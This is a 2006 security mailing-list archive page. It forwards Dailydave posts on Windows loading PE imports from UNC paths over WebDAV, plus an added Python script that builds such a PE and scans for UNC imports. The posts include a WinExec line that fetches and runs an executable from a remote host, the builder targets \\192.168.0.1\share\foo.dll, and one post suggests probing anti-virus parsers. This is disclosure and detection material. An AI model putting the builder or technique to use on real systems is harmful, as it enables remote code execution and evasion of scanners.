Archive :: Security-alerts
Security-Alerts mailing list archive (security-alerts@yandex-team.ru)


[security-alerts] FYI: UNC imports in PE files



> 
> ------------------------------
> 
> Message: 2
> Date: Tue, 7 Nov 2006 02:59:10 -0800
> From: Solar Eclipse <solareclipse@xxxxxxxxxxxx>
> Subject: [Dailydave] UNC imports in PE files
> To: dailydave@xxxxxxxxxxxxxxxxxxxxx
> Message-ID:
>       <20061107105910.GA19579@xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx>
> Content-Type: text/plain; charset="us-ascii"
> 
> Hello list,
> 
> Most of you probably know that the WebDAV redirector in Windows XP tries to
> resolve UNC paths from all applications with WebDAV requests on port 80. This
> means that instead of calling URLDownloadToFile("http://192.168.0.1/foo.exe")
> and then WinExec, you can do just WinExec("\\192.168.0.1\foo.exe")
> 
> What you probably don't know is that you can use a full UNC path instead of a
> DLL name in the import section of a PE file. When the file is executed, the
> loader will try to access the imported DLL using the UNC path and the WebDAV
> redirector will download the DLL from the Internet.
> 
> It is getting increasingly harder to draw (and defend) the boundaries between
> the local machine, the local network and the Internet.
> 
> Check out http://www.phreedom.org/solar/code/tinype/ for the source code of a
> 137 byte PE file that downloads a DLL over WebDAV and executes the payload in
> its DllMain function. The PE file doesn't even have to contain any code,
> because DllMain is executed before the entry point of the executable.
> 
> The page also has detailed information about hacking the PE header and
> building the smallest possible PE file that can be executed on Windows. Its
> size is only 97 bytes.
> 
> If anybody is really bored, feel free to check how many anti-virus products
> have PE parsers that don't handle the header of the 97 byte PE file properly
> and fail to unpack and scan the code in the file.
> 
> 
> Good night and good luck,
> Solar Eclipse
> 
> ------------------------------
> 
> 
> ------------------------------
> 
> Message: 7
> Date: Wed, 8 Nov 2006 13:57:16 +0000
> From: Barrie Dempster <barrie@xxxxxxxxxxxxxxxx>
> Subject: Re: [Dailydave] UNC imports in PE files
> To: dailydave@xxxxxxxxxxxxxxxxxxxxx
> Message-ID: <200611081357.35854.barrie@xxxxxxxxxxxxxxxx>
> Content-Type: text/plain; charset="iso-8859-15"
> 
> On Tuesday 07 November 2006 10:59, Solar Eclipse wrote:
> <snip>
> > What you probably don't know is that you can use a full UNC path instead of
> > a DLL name in the import section of a PE file. When the file is executed,
> > the loader will try to access the imported DLL using the UNC path and the
> > WebDAV redirector will download the DLL from the Internet.
> 
> 
> Whilst using this technique to decrease PE size is quite interesting, I'd be
> willing to bet most here would already be aware of the redirector
> functionality when loading DLLs, as it was pointed out by Dave Litchfield
> over a year ago.
> 
> www.ngssoftware.com/papers/xpms.pdf
> 
> -- 
> With Regards..
> Barrie Dempster (zeedo) - Fortiter et Strenue
> 
>               - http://reboot-robot.net -
> 
> "He who hingeth aboot, geteth hee-haw" Victor - Still Game
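
Below is an added example written for this archive page; it is not code from Solar Eclipse's post or from the tinype project. It builds a minimal PE32 whose only import names a DLL by UNC path, then parses the import directory back the way a triage tool would and flags any import whose name is a UNC path. The 192.168.0.1 address comes from the post; the share and file names, the imported Sleep function, the image base and every other header constant are assumptions chosen for illustration. The built file is only written to bytes, never executed; on Windows XP with the WebDAV redirector enabled, running it would make the loader resolve the import over WebDAV as the post describes.

```python
"""Added example (not from the post or tinype): build a PE32 with a UNC-path
import, then scan the import directory and flag UNC DLL names."""
import struct

SECTION_RVA = 0x1000   # virtual address of the single section (assumed)
SECTION_RAW = 0x200    # file offset of that section; also SizeOfHeaders


def build_pe(dll_name, func_name="Sleep"):
    r"""Return a minimal 32-bit PE that imports func_name from dll_name.
    The DLL name is stored verbatim, so a UNC path such as \\host\share\x.dll
    reaches the loader exactly as written (constructed test image)."""
    base = SECTION_RVA
    body = bytearray(40)                      # one import descriptor + null terminator
    int_off = len(body); body += bytes(8)     # import name table: one thunk + null
    iat_off = len(body); body += bytes(8)     # import address table: same shape
    ibn_off = len(body); body += struct.pack("<H", 0) + func_name.encode() + b"\0"
    name_off = len(body); body += dll_name.encode("latin-1") + b"\0"
    entry_off = len(body); body += b"\xC3"    # entry point is a bare 'ret'
    struct.pack_into("<5I", body, 0, base + int_off, 0, 0, base + name_off, base + iat_off)
    struct.pack_into("<II", body, int_off, base + ibn_off, 0)
    struct.pack_into("<II", body, iat_off, base + ibn_off, 0)
    raw_size = (len(body) + 0x1FF) & ~0x1FF
    body += bytes(raw_size - len(body))

    dos = bytearray(64); dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)   # e_lfanew -> PE signature at 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x0102)  # i386, 1 section
    opt_fmt = "<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "H" * 2 + "I" * 6
    opt = struct.pack(opt_fmt,
                      0x10B, 0, 0,                      # PE32 magic, linker version
                      raw_size, 0, 0,                   # SizeOfCode/InitData/UninitData
                      base + entry_off, base, base,     # entry point, BaseOfCode, BaseOfData
                      0x400000, 0x1000, 0x200,          # ImageBase, section/file alignment
                      4, 0, 0, 0, 4, 0,                 # OS, image, subsystem versions
                      0, 0x2000, SECTION_RAW, 0,        # Win32Version, SizeOfImage, SizeOfHeaders, CheckSum
                      2, 0,                             # GUI subsystem, DllCharacteristics
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    dirs = [(0, 0)] * 16
    dirs[1] = (base, 40)                      # IMAGE_DIRECTORY_ENTRY_IMPORT
    dirs[12] = (base + iat_off, 8)            # IMAGE_DIRECTORY_ENTRY_IAT
    opt += b"".join(struct.pack("<II", *d) for d in dirs)
    sect = struct.pack("<8sIIIIIIHHI", b".text", len(body), base, raw_size,
                       SECTION_RAW, 0, 0, 0, 0, 0xE0000060)  # code|data|rwx
    headers = dos + b"PE\0\0" + coff + opt + sect
    headers += bytes(SECTION_RAW - len(headers))
    return bytes(headers + body)


def _rva_to_off(sections, rva):
    """Map an RVA to a file offset via the section table."""
    for va, vsize, raw, rawsize in sections:
        if va <= rva < va + max(vsize, rawsize):
            return rva - va + raw
    raise ValueError("RVA 0x%x is not backed by any section" % rva)


def import_names(data):
    """Walk IMAGE_IMPORT_DESCRIPTORs and return DLL names exactly as stored.
    Follows e_lfanew and SizeOfOptionalHeader instead of assuming fixed
    offsets, so overlapped/hand-packed headers still parse."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file")
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    nsec = struct.unpack_from("<H", data, pe + 6)[0]
    optsize = struct.unpack_from("<H", data, pe + 20)[0]
    opt = pe + 24
    magic = struct.unpack_from("<H", data, opt)[0]
    dirs = opt + (96 if magic == 0x10B else 112)      # PE32 vs PE32+ layout
    if struct.unpack_from("<I", data, dirs - 4)[0] < 2:  # NumberOfRvaAndSizes
        return []
    imp_rva = struct.unpack_from("<I", data, dirs + 8)[0]
    if imp_rva == 0:
        return []
    sections = []
    for i in range(nsec):
        _, vsize, va, rawsize, raw = struct.unpack_from("<8sIIII", data, opt + optsize + 40 * i)
        sections.append((va, vsize, raw, rawsize))
    names, off = [], _rva_to_off(sections, imp_rva)
    while off + 20 <= len(data):
        int_rva, _, _, name_rva, iat_rva = struct.unpack_from("<5I", data, off)
        if not (int_rva or name_rva or iat_rva):      # all-zero terminator
            break
        noff = _rva_to_off(sections, name_rva)
        names.append(data[noff:data.index(b"\0", noff)].decode("latin-1"))
        off += 20
    return names


def unc_imports(data):
    r"""Imported DLL names that are UNC paths (\\host\share\... or //host/...)."""
    return [n for n in import_names(data) if n.startswith(("\\\\", "//"))]


if __name__ == "__main__":
    sample = build_pe(r"\\192.168.0.1\share\foo.dll")   # constructed sample image
    print("imports:", import_names(sample))
    print("UNC imports:", unc_imports(sample))
```

The scanner deliberately reads the section table and the RVA-to-offset mapping instead of trusting that the import directory sits at a fixed place, which is the kind of assumption the post's 97-byte header is meant to trip. The check covers only names stored in the import directory; a DLL loaded at runtime with LoadLibrary on a UNC path goes through the same redirector but leaves no trace in the import table, so on-host telemetry (outbound port 80 WebDAV from the loader) is the complementary signal.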



 




Copyright © Lexa Software, 1996-2009.